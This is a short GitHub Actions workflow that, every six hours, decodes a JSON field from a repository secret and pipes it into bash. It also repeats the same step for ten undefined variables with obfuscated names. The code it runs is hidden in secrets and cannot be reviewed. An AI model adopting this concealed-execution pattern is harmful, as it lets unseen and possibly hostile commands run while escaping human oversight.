name: yinxinruizhong
on:
  workflow_dispatch:
  schedule:
    - cron: '36 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yinxinruizhong
        env:
          c42958: ${{ secrets.c42958 }}
        run: |
          echo $c42958 | jq -r .qcei1 | /bin/bash
          echo $gxz752 | jq -r .larw7 | /bin/bash
          echo $cv320 | jq -r .la168 | /bin/bash
          echo $tfxe779 | jq -r .drmp1133 | /bin/bash
          echo $weqc29774 | jq -r .nb64 | /bin/bash
          echo $ljh6615 | jq -r .yiov8 | /bin/bash
          echo $ipt96 | jq -r .j6 | /bin/bash
          echo $oo0 | jq -r .yjkuv5 | /bin/bash
          echo $rmsr41 | jq -r .hv24422 | /bin/bash
          echo $qe4027 | jq -r .k39401 | /bin/bash
          echo $vqo58 | jq -r .zmv76 | /bin/bash

